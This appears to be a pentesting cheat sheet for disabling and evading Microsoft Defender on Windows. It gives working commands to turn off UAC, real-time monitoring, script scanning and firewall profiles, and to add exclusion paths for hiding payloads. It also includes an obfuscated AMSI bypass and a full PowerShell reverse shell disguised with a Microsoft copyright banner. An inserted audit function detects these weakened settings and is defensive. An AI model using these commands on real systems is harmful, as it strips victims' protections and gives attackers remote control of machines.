Disable and Bypass Defender
Check if Defender is enabled
# Check if Defender is enabled
Get-MpComputerStatus
Get-MpComputerStatus | Select AntivirusEnabled
# Check if defensive modules are enabled
Get-MpComputerStatus | Select RealTimeProtectionEnabled, IoavProtectionEnabled, AntispywareEnabled | FL
# Check if tamper protection is enabled
Get-MpComputerStatus | Select IsTamperProtected, RealTimeProtectionEnabled | FL
Alternative Antivirus products
In some cases, if Defender appears not to be enabled, an alternative antivirus solution may be in effect. Query the Security Center to list the registered products:
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct

Decoding the value of ProductState to hex can help identify which antivirus product is enabled:
'0x{0:x}' -f <ProductState>
'0x{0:x}' -f 393472
In the hex values below, a 10 starting from the fourth numerical position indicates On; anything else indicates Off. In the example below we can see BitDefender is enabled and Windows Defender is disabled.

Turning off features
Note: Disabling UAC is advisable before attempting to turn features off. In testing, some changes prompted for user confirmation before the change was allowed.
cmd.exe /c "C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
Note: If tamper protection is enabled you will not be able to turn off Defender via CMD or PowerShell. You can, however, still create an exclusion.
# Disables realtime monitoring
Set-MpPreference -DisableRealtimeMonitoring $true
# Disables scanning for downloaded files or attachments
Set-MpPreference -DisableIOAVProtection $true
# Disable behavior monitoring (the parameter uses the American spelling)
Set-MpPreference -DisableBehaviorMonitoring $true
# Make exclusion for a certain folder
Add-MpPreference -ExclusionPath "C:\Windows\Temp"
# Disables Block at First Sight (cloud-based blocking of newly seen files)
Set-MpPreference -DisableBlockAtFirstSeen $true
# Disables scanning of .pst and other email formats
Set-MpPreference -DisableEmailScanning $true
# Disables script scanning during malware scans
Set-MpPreference -DisableScriptScanning $true
# Exclude files by extension
Set-MpPreference -ExclusionExtension "ps1"
# Turn off everything and set exclusion to "C:\Windows\Temp"
Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MpPreference -DisableBehaviorMonitoring $true;Set-MpPreference -DisableBlockAtFirstSeen $true;Set-MpPreference -DisableEmailScanning $true;Set-MpPreference -DisableScriptScanning $true;Add-MpPreference -ExclusionPath "C:\Windows\Temp"
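From the defensive side, the same preferences the commands above toggle are exactly what an audit should check. The following PowerShell is an added example (not part of these notes): it reports every weakened Get-MpPreference flag, lists path, extension and process exclusions, checks tamper protection, and pulls recent configuration-change events (event ID 5007) from the Defender operational log. It assumes an elevated shell on a host with the Defender module installed.

```powershell
# Added audit example, not from the original notes: reports the Get-MpPreference
# settings the commands above weaken, any exclusions, and recent configuration-change
# events (ID 5007) from the Defender operational log. Assumes an elevated shell.
function Get-DefenderWeakening {
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus
    $findings = New-Object 'System.Collections.Generic.List[string]'

    # Each flag is $true only if someone ran Set-MpPreference -Disable... $true
    $flags = 'DisableRealtimeMonitoring', 'DisableIOAVProtection', 'DisableBehaviorMonitoring',
             'DisableBlockAtFirstSeen', 'DisableEmailScanning', 'DisableScriptScanning'
    foreach ($f in $flags) {
        if ($pref.$f) { $findings.Add("Setting weakened: $f = True") }
    }

    # Exclusions can still be added while tamper protection is on, so always list them
    foreach ($p in @($pref.ExclusionPath))      { if ($p) { $findings.Add("Path exclusion: $p") } }
    foreach ($e in @($pref.ExclusionExtension)) { if ($e) { $findings.Add("Extension exclusion: $e") } }
    foreach ($x in @($pref.ExclusionProcess))   { if ($x) { $findings.Add("Process exclusion: $x") } }

    if (-not $status.IsTamperProtected)         { $findings.Add('Tamper protection is OFF') }
    if (-not $status.RealTimeProtectionEnabled) { $findings.Add('Real-time protection is OFF') }

    # Event 5007 is written for every Defender configuration change; look back 7 days
    $filter = @{ LogName   = 'Microsoft-Windows-Windows Defender/Operational'
                 Id        = 5007
                 StartTime = (Get-Date).AddDays(-7) }
    $changes = Get-WinEvent -FilterHashtable $filter -MaxEvents 20 -ErrorAction SilentlyContinue
    foreach ($ev in $changes) {
        $firstLine = ($ev.Message -split "`n")[0].Trim()
        $findings.Add(('Config change at {0}: {1}' -f $ev.TimeCreated, $firstLine))
    }
    return $findings
}

Get-DefenderWeakening
```

An empty result means none of the settings above have been disabled, no exclusions exist, and no configuration changes were logged in the last week.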
Bypassing with Path Exclusions
With reference to the above, we see it's possible to use PowerShell to stop Windows Defender from taking action on certain paths by defining path exclusions.
Add-MpPreference -ExclusionPath "C:\Windows\Temp"
Running curl on a msfvenom payload where the output folder is outside of the defined exclusion path:

Running the same command again, but this time writing to the path excluded from Defender, C:\temp, we see Defender has not picked up the malware.

Over on the attacker's machine we see the msfvenom payload has connected back. Under normal circumstances AV has no trouble detecting this msfvenom payload.

Firewall
Disable all Firewall profiles (Requires Admin privileges).
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
AMSI Bypass
Tools
Amsi.Fail: https://amsi.fail/
AMSITrigger: https://github.com/RythmStick/AMSITrigger
PowerShell snippets
$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)
Undetected Reverse Shells
$c = New-Object System.Net.Sockets.TCPClient(<IP>,<Port>);
$I = $c.GetStream();
[byte[]]$U = 0..(2-shl15)|%{0};
$U = ([text.encoding]::ASCII).GetBytes("Copyright (C) 2021 Microsoft Corporation. All rights reserved.`n`n")
$I.Write($U,0,$U.Length)
$U = ([text.encoding]::ASCII).GetBytes((Get-Location).Path + '>')
$I.Write($U,0,$U.Length)
while(($k = $I.Read($U, 0, $U.Length)) -ne 0){;$D = (New-Object System.Text.UTF8Encoding).GetString($U,0, $k);
$a = (iex $D 2>&1 | Out-String );
$r = $a + (pwd).Path + '> ';
$m = ([text.encoding]::ASCII).GetBytes($r);
$I.Write($m,0,$m.Length);
$I.Flush()};
$c.Close()
Further AMSI Reading
URL: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
URL: https://amsi.fail/
Resources
Tamper Protection: https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide